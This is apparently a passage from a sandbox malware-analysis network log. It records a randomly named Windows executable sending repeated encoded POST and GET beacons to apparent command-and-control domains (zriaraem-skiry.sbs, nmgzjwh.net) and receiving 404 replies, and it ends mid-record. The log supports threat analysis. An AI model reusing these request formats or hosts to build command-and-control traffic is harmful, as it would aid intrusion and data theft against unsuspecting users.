                                                                                      Origin: http://www.zriaraem-skiry.sbs
                                                                                      Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 53 68 41 4b 37 5a 4c 36 56 38 62 38 34 30 75 6c 79 36 67 57 52 57 6f 64 79 65 71 54 4c 43 6a 31 44 74 63 7a 70 75 45 51 68 37 72 46 6e 62 7a 54 45 4c 65 4c 66 74 50 37 54 67 41 48 56 47 2b 64 67 55 71 39 4c 42 6d 6d 34 68 44 75 34 76 30 6a 67 72 6a 5a 52 4e 2f 2f 46 46 47 48 55 74 35 46 33 38 6f 44 38 77 35 52 62 48 79 4b 55 7a 45 59 46 6c 39 6f 45 2f 49 2b 72 44 34 70 32 54 4e 6d 5a 74 6f 5a 6a 32 31 53 55 54 45 61 59 78 48 62 73 59 77 50 39 46 79 33 58 52 67 6c 72 42 78 53 32 4f 71 7a 75 73 4e 38 46 7a 4c 6f 76 45 41 53 77 74 4d 73 76 51 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=nbjRd4jDDoGnShAK7ZL6V8b840uly6gWRWodyeqTLCj1DtczpuEQh7rFnbzTELeLftP7TgAHVG+dgUq9LBmm4hDu4v0jgrjZRN//FFGHUt5F38oD8w5RbHyKUzEYFl9oE/I+rD4p2TNmZtoZj21SUTEaYxHbsYwP9Fy3XRglrBxS2OqzusN8FzLovEASwtMsvQ==
                                                                                      Nov 24, 2024 08:12:27.641200066 CET1236INHTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:27 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBf1BjCvoiC1SKu16txwjLORJtdwAflJvnPVMD7uoQXCMcbVbQdLLZ8MWbE3M%2Fb9BPRu2m73E4YBQ7AzBYZPeqC78ORTKK9m118VIuVBpUKBMY9UR4oPKsPCuK0HGZ6TYVJUQPi7uMbM"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e77973a5fc741c1-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f d3 30 10 7e df af 38 82 40 20 2d 75 d3 6e 8c 26 69 a4 d1 6e 62 d2 80 89 15 c1 1e bd e4 1a 7b 24 76 b0 af 69 c3 c4 7f 47 4e b2 b6 13 b0 27 9c 17 fb ee bb ef bb 73 ee 1c 3f 9b 7f 9a 2d 6e ae ce 40 50 59 c0 d5 97 77 97 17 33 f0 7c c6 be 8e 67 8c cd 17 73 f8 f6 7e f1 e1 12 82 c1 10 ae c9 c8 94 18 3b fb e8 81 27 88 aa 90 b1 f5 7a 3d 58 8f 07 da e4 6c f1 99 6d 1c 4b e0 c2 fa ad 6f db 98 41 46 99 97 1c c4 ad c8 a6 2c 94 9d fe 85 20 98 4c 26 5d 9c e7 40 61 c1 55 3e f5 50 79 b0 dd 25 b1 40 9e 25 07 00 00 31 49 2a 30 39 1a 1e c1 cb 32 e3 56 44 f0 51 13 9c eb 95 ca 62 d6 39 3b 60 89 c4 c1 e9 f9 f8 63 25 eb a9 37 d3 8a 50 91 bf 68 2a f4 20 ed 4e 53 8f 70 43 cc e9 47 90 0a 6e 2c d2 f4 cb e2 dc 7f eb b1 7d 22 c5 4b 9c 7a 19 da d4 c8 8a a4 56 7b 0c d7 da 98 e6 10 2a 9e 23 28 4d b0 74 c9 6c c3 2d 35 05 02 35 15 f6 5a a9 b5 5e e7 73 eb 56 67 0d dc 2f b5 22 df ca 9f 18 06 47 d5 26 82 54 17 da 84 cf 4f da 15 41 eb 5e f2 52 16 4d c8 8d e4 45 04 8e ca e7 85 cc 55 [TRUNCATED]
                                                                                      Data Ascii: 2d0TQo0~8@ -un&inb{$viGN's?-n@PYw3|gs~;'z=XlmKoAF, L&]@aU>Py%@%1I*092VDQb9;`c%7Ph* NSpCGn,}"KzV{*#(Mtl-55Z^sVg/"G&TOA^RMEU"4-1QN&'Rp260t>;<<};"a
                                                                                      Nov 24, 2024 08:12:27.641267061 CET334INData Raw: 32 17 14 c2 ad 2e b2 08 0a 24 42 e3 db 8a a7 52 e5 21 f8 81 03 3e c8 fb e3 56 7e 3c a9 36 7b fa 15 dc af 65 46 22 1c 77 b4 7f 16 db 13 f8 05 2e 29 e4 2b d2 51 6f 30 ad 76 6b 79 c0 90 ae 42 18 bb 3a 77 0a 99 ac ff 8b c6 8e 91 87 85 54 df 77 f7 36
                                                                                      Data Ascii: 2.$BR!>V~<6{eF"w.)+Qo0vkyB:wTw6>:9}I5 b[rnhba}/VIA\n'QqSr5HudwObVa"p3<Fz@nJ52T9<iFZR<m-$l+HK


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      38192.168.2.450040104.21.42.77804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:29.008268118 CET760OUTPOST /f8c6/ HTTP/1.1
                                                                                      Host: www.zriaraem-skiry.sbs
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.zriaraem-skiry.sbs
                                                                                      Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 54 42 77 4b 35 35 33 36 63 38 62 37 33 55 75 6c 6b 4b 68 64 52 58 55 64 79 62 4b 44 4c 51 58 31 47 34 67 7a 6d 50 45 51 78 72 72 46 6f 4c 7a 53 4b 72 65 4d 66 74 53 4d 54 6c 41 48 56 48 61 64 67 51 36 39 4c 51 6e 55 37 52 44 73 33 50 30 68 2f 37 6a 5a 52 4e 2f 2f 46 46 43 74 55 74 68 46 33 4d 34 44 7a 78 35 53 52 6e 79 4a 64 54 45 59 55 31 39 6b 45 2f 4a 64 72 42 4d 54 32 58 39 6d 5a 76 67 5a 6a 69 70 64 50 6a 45 6d 57 52 47 69 39 59 35 33 37 31 37 47 53 77 49 6c 71 41 4a 4f 36 6f 6e 70 2f 64 73 72 58 7a 76 62 79 44 4a 6d 39 75 78 6c 30 51 49 79 63 49 45 6c 49 33 73 42 58 6c 67 34 4a 42 58 77 67 67 45 3d
                                                                                      Data Ascii: 3vNdCBvX=nbjRd4jDDoGnTBwK5536c8b73UulkKhdRXUdybKDLQX1G4gzmPEQxrrFoLzSKreMftSMTlAHVHadgQ69LQnU7RDs3P0h/7jZRN//FFCtUthF3M4Dzx5SRnyJdTEYU19kE/JdrBMT2X9mZvgZjipdPjEmWRGi9Y53717GSwIlqAJO6onp/dsrXzvbyDJm9uxl0QIycIElI3sBXlg4JBXwggE=
                                                                                      Nov 24, 2024 08:12:30.335587978 CET1236INHTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:30 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jc13MpNOkPSm%2FHCpuh0AsaK8KFSNwt4%2BJz0QSc8P%2BAIOrgVBoLP%2FPJVm8yiGz2GogPEWldPSg%2Fej5X%2FbbAHevb7q3n1x4XtVlYhE49e0gg%2Fwna%2BrMmFxi7nVxYLLJ3VD5FbkslM7UW4G"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e77974b3c5fc325-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1483&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f d3 30 10 7e df af 38 82 40 20 2d 75 d3 6e 8c 26 69 a4 d1 6e 62 d2 80 89 15 c1 1e bd e4 1a 7b 24 76 b0 af 69 c3 c4 7f 47 4e b2 b6 13 b0 27 9c 17 fb ee bb ef bb 73 ee 1c 3f 9b 7f 9a 2d 6e ae ce 40 50 59 c0 d5 97 77 97 17 33 f0 7c c6 be 8e 67 8c cd 17 73 f8 f6 7e f1 e1 12 82 c1 10 ae c9 c8 94 18 3b fb e8 81 27 88 aa 90 b1 f5 7a 3d 58 8f 07 da e4 6c f1 99 6d 1c 4b e0 c2 fa ad 6f db 98 41 46 99 97 1c c4 ad c8 a6 2c 94 9d fe 85 20 98 4c 26 5d 9c e7 40 61 c1 55 3e f5 50 79 b0 dd 25 b1 40 9e 25 07 00 00 31 49 2a 30 39 1a 1e c1 cb 32 e3 56 44 f0 51 13 9c eb 95 ca 62 d6 39 3b 60 89 c4 c1 e9 f9 f8 63 25 eb a9 37 d3 8a 50 91 bf 68 2a f4 20 ed 4e 53 8f 70 43 cc e9 47 90 0a 6e 2c d2 f4 cb e2 dc 7f eb b1 7d 22 c5 4b 9c 7a 19 da d4 c8 8a a4 56 7b 0c d7 da 98 e6 10 2a 9e 23 28 4d b0 74 c9 6c c3 2d 35 05 02 35 15 f6 5a a9 b5 5e e7 73 eb 56 67 0d dc 2f b5 22 df ca 9f 18 06 47 d5 26 82 54 17 da 84 cf 4f da 15 41 eb 5e f2 52 16 4d c8 8d e4 45 04 8e ca e7 85 cc 55 [TRUNCATED]
                                                                                      Data Ascii: 2d0TQo0~8@ -un&inb{$viGN's?-n@PYw3|gs~;'z=XlmKoAF, L&]@aU>Py%@%1I*092VDQb9;`c%7Ph* NSpCGn,}"KzV{*#(Mtl-55Z^sVg/"G&TOA^RMEU"4-1QN&'Rp260t>;<<
                                                                                      Nov 24, 2024 08:12:30.335604906 CET348INData Raw: cf 1f e7 00 7d 12 3b 11 18 b5 22 ad 61 8d 32 17 14 c2 ad 2e b2 08 0a 24 42 e3 db 8a a7 52 e5 21 f8 81 03 3e c8 fb e3 56 7e 3c a9 36 7b fa 15 dc af 65 46 22 1c 77 b4 7f 16 db 13 f8 05 2e 29 e4 2b d2 51 6f 30 ad 76 6b 79 c0 90 ae 42 18 bb 3a 77 0a
                                                                                      Data Ascii: };"a2.$BR!>V~<6{eF"w.)+Qo0vkyB:wTw6>:9}I5 b[rnhba}/VIA\n'QqSr5HudwObVa"p3<Fz@nJ52T9<iFZR<m-$


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      39192.168.2.450041104.21.42.77804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:31.857707977 CET10842OUTPOST /f8c6/ HTTP/1.1
                                                                                      Host: www.zriaraem-skiry.sbs
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.zriaraem-skiry.sbs
                                                                                      Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 54 42 77 4b 35 35 33 36 63 38 62 37 33 55 75 6c 6b 4b 68 64 52 58 55 64 79 62 4b 44 4c 51 50 31 61 65 30 7a 6e 73 73 51 79 72 72 46 75 37 7a 58 4b 72 66 4a 66 74 4b 49 54 6c 45 58 56 46 53 64 6d 43 79 39 66 79 50 55 73 42 44 73 31 50 30 73 67 72 69 54 52 4a 6a 42 46 46 53 74 55 74 68 46 33 50 51 44 33 67 35 53 65 48 79 4b 55 7a 45 63 46 6c 39 49 45 38 34 6d 72 42 59 44 32 6b 31 6d 5a 50 77 5a 68 58 31 64 44 6a 45 67 56 52 47 54 39 59 6c 6f 37 31 6d 35 53 77 4e 43 71 41 74 4f 35 2b 61 77 67 2b 55 74 41 42 44 33 75 78 52 63 38 70 56 72 7a 58 46 50 4e 4e 59 67 62 57 6f 42 4e 48 6c 42 53 52 7a 73 2b 6b 42 64 55 34 64 54 58 48 55 4c 67 34 2f 79 52 65 49 7a 4b 46 6e 74 76 70 31 30 6d 64 53 2b 6d 6a 44 79 68 54 7a 66 53 75 6e 68 62 47 73 2f 66 30 6a 39 72 62 79 76 34 6a 44 4c 72 6d 69 50 31 42 48 6f 68 77 58 30 75 57 69 63 61 6d 68 73 53 56 51 32 4e 57 33 67 4b 35 6b 2b 4a 67 55 63 4d 51 39 77 52 59 57 58 6e 6f 42 70 44 61 54 42 46 72 4c 46 42 [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=nbjRd4jDDoGnTBwK5536c8b73UulkKhdRXUdybKDLQP1ae0znssQyrrFu7zXKrfJftKITlEXVFSdmCy9fyPUsBDs1P0sgriTRJjBFFStUthF3PQD3g5SeHyKUzEcFl9IE84mrBYD2k1mZPwZhX1dDjEgVRGT9Ylo71m5SwNCqAtO5+awg+UtABD3uxRc8pVrzXFPNNYgbWoBNHlBSRzs+kBdU4dTXHULg4/yReIzKFntvp10mdS+mjDyhTzfSunhbGs/f0j9rbyv4jDLrmiP1BHohwX0uWicamhsSVQ2NW3gK5k+JgUcMQ9wRYWXnoBpDaTBFrLFBgJdmQwiyKUJqVXUgx32z66E7lSfSwBm92fjCoYGkvVQDEgJP14MIsBGccE1TLiZflI/MnVdC4LwVDUDBx/6TtyW//sjSwJLRtvtPOFXpG7R7mr9wh/hKtwQuoYU3OYc0Ec88LZCl4+xWkl30PChomE8sCe7diIkiZ56nGdiphwSNEaMM23Mtg8aGamJvwyi/l+Ii7bi6D+msEC+4v/OTPOnb6OzeLUU6fEZbG9W0VKP5ABYmE5JrL6mrpgyB+ljxGAhAZv2qHJwJJ1Cr1N8YbO7qVGEkd82QsFVVSh55tJstPfS/tnyBzNImDj2G5nO15zYbccXNaewkjga94wU8JVkwTXnXgBs0ISyzCtREji2mJpZ2meMTlLZsb6yDAs/sPEfWcpgK/cRHaGq4UeTu6wc3KohZqhaM6muPAPwZbMHbGVHJ0kOsDFt5PlMEVQyx0tInst/WwOIHRpoOa3eal89krYCrKXRn2ydUNHla12b8Jp+CNg9eciDqE0MEH+V6f4stBEGrEH9Lkr2DCuxLxVDOJQnFtIEu+rD01V4vJIEAjp9jpnVbKj3i4Wck/u4FHg21PrBgamXbtxvpWV9hDoU7lqqNy/LCZk8lfzaEMMW9I/ZPYpwpFasa3nXPAOmIGOxj5ikREaCLnIrAO47y4EoLLeK6H1bcmm [TRUNCATED]
                                                                                      Nov 24, 2024 08:12:33.076814890 CET1236INHTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:32 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1AgBr3xSXfcRde%2FSAIDDN9sIKwa1vbLebtGg8HcQqLR2diOP22MxOzsy76fu0Es9np2gSxqNwKAzGEfj1txMU8KvHy1yHg6IktTiwGi3G01hlqHbG8085LuRQepcj%2FSZQseL1QhHl9Ko"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e77975c8fa21a34-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1783&sent=3&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10842&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f d3 30 10 7e df af 38 82 40 20 2d 75 d3 6e 8c 26 69 a4 d1 6e 62 d2 80 89 15 c1 1e bd e4 1a 7b 24 76 b0 af 69 c3 c4 7f 47 4e b2 b6 13 b0 27 9c 17 fb ee bb ef bb 73 ee 1c 3f 9b 7f 9a 2d 6e ae ce 40 50 59 c0 d5 97 77 97 17 33 f0 7c c6 be 8e 67 8c cd 17 73 f8 f6 7e f1 e1 12 82 c1 10 ae c9 c8 94 18 3b fb e8 81 27 88 aa 90 b1 f5 7a 3d 58 8f 07 da e4 6c f1 99 6d 1c 4b e0 c2 fa ad 6f db 98 41 46 99 97 1c c4 ad c8 a6 2c 94 9d fe 85 20 98 4c 26 5d 9c e7 40 61 c1 55 3e f5 50 79 b0 dd 25 b1 40 9e 25 07 00 00 31 49 2a 30 39 1a 1e c1 cb 32 e3 56 44 f0 51 13 9c eb 95 ca 62 d6 39 3b 60 89 c4 c1 e9 f9 f8 63 25 eb a9 37 d3 8a 50 91 bf 68 2a f4 20 ed 4e 53 8f 70 43 cc e9 47 90 0a 6e 2c d2 f4 cb e2 dc 7f eb b1 7d 22 c5 4b 9c 7a 19 da d4 c8 8a a4 56 7b 0c d7 da 98 e6 10 2a 9e 23 28 4d b0 74 c9 6c c3 2d 35 05 02 35 15 f6 5a a9 b5 5e e7 73 eb 56 67 0d dc 2f b5 22 df ca 9f 18 06 47 d5 26 82 54 17 da 84 cf 4f da 15 41 eb 5e f2 52 16 4d c8 8d e4 45 04 8e ca e7 85 cc 55 [TRUNCATED]
                                                                                      Data Ascii: 2d0TQo0~8@ -un&inb{$viGN's?-n@PYw3|gs~;'z=XlmKoAF, L&]@aU>Py%@%1I*092VDQb9;`c%7Ph* NSpCGn,}"KzV{*#(Mtl-55Z^sVg/"G&TOA^RMEU"4-1QN&'Rp260t>;<<};
                                                                                      Nov 24, 2024 08:12:33.076905012 CET334INData Raw: b5 22 ad 61 8d 32 17 14 c2 ad 2e b2 08 0a 24 42 e3 db 8a a7 52 e5 21 f8 81 03 3e c8 fb e3 56 7e 3c a9 36 7b fa 15 dc af 65 46 22 1c 77 b4 7f 16 db 13 f8 05 2e 29 e4 2b d2 51 6f 30 ad 76 6b 79 c0 90 ae 42 18 bb 3a 77 0a 99 ac ff 8b c6 8e 91 87 85
                                                                                      Data Ascii: "a2.$BR!>V~<6{eF"w.)+Qo0vkyB:wTw6>:9}I5 b[rnhba}/VIA\n'QqSr5HudwObVa"p3<Fz@nJ52T9<iFZR<m-$l+H
                                                                                      Nov 24, 2024 08:12:33.077071905 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      40192.168.2.450042104.21.42.77804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:34.569503069 CET466OUTGET /f8c6/?3vNdCBvX=qZLxeIvUMpnHejM+2fTaZNrv2WO4y9kWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgsy7m2PREgKHVMtzZClnOVsBz8/E/4iFHS34=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.zriaraem-skiry.sbs
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:12:35.944679022 CET1236INHTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:35 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XU%2B%2FeBuyhZbQaCVHCP8THNIc8pBHNmgYv2RthtfTySjzC3HuAWKYDvZPTfdes3m7Yyo%2FAeOtdcQ7JtJIhih4f4wDjWWOuRh7D4%2BJX5T6%2Ft20IOZJOzmPdYucrZfsFbZEjFmkLTLA%2BUjy"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e77976dee424261-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1571&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=466&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 35 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                                      Data Ascii: 57d<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font
                                                                                      Nov 24, 2024 08:12:35.944747925 CET1005INData Raw: 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74
                                                                                      Data Ascii: -size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      41192.168.2.450043172.67.168.228804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:41.862071991 CET719OUTPOST /gb2h/ HTTP/1.1
                                                                                      Host: www.nmgzjwh.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.nmgzjwh.net
                                                                                      Referer: http://www.nmgzjwh.net/gb2h/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 4a 43 36 53 33 72 39 63 30 66 53 50 41 70 6b 54 70 45 35 6e 6d 54 4f 74 52 4c 51 36 6c 6e 79 67 70 7a 36 39 43 68 70 42 41 70 65 63 6f 75 4e 6a 59 54 31 69 41 53 73 55 4a 57 4b 67 36 6e 4d 2b 77 62 36 75 67 30 36 45 48 57 45 6f 58 30 41 39 77 7a 4e 30 54 62 59 35 73 52 34 62 6e 77 53 44 65 45 47 57 53 31 2b 53 46 44 4d 63 6f 64 6e 4a 6d 2b 42 59 61 75 43 47 46 39 30 34 55 46 4e 59 66 53 4d 4d 77 55 57 46 68 67 37 6a 52 36 55 46 42 4c 74 49 4c 43 2f 50 67 38 4c 6c 55 59 6c 4e 6f 4d 71 54 49 37 66 78 74 64 63 62 67 65 6e 6d 38 7a 33 69 67 4c 66 37 74 67 33 62 58 58 37 52 76 77 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=JC6S3r9c0fSPApkTpE5nmTOtRLQ6lnygpz69ChpBApecouNjYT1iASsUJWKg6nM+wb6ug06EHWEoX0A9wzN0TbY5sR4bnwSDeEGWS1+SFDMcodnJm+BYauCGF904UFNYfSMMwUWFhg7jR6UFBLtILC/Pg8LlUYlNoMqTI7fxtdcbgenm8z3igLf7tg3bXX7Rvw==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      42192.168.2.450044172.67.168.228804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:44.523943901 CET739OUTPOST /gb2h/ HTTP/1.1
                                                                                      Host: www.nmgzjwh.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.nmgzjwh.net
                                                                                      Referer: http://www.nmgzjwh.net/gb2h/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
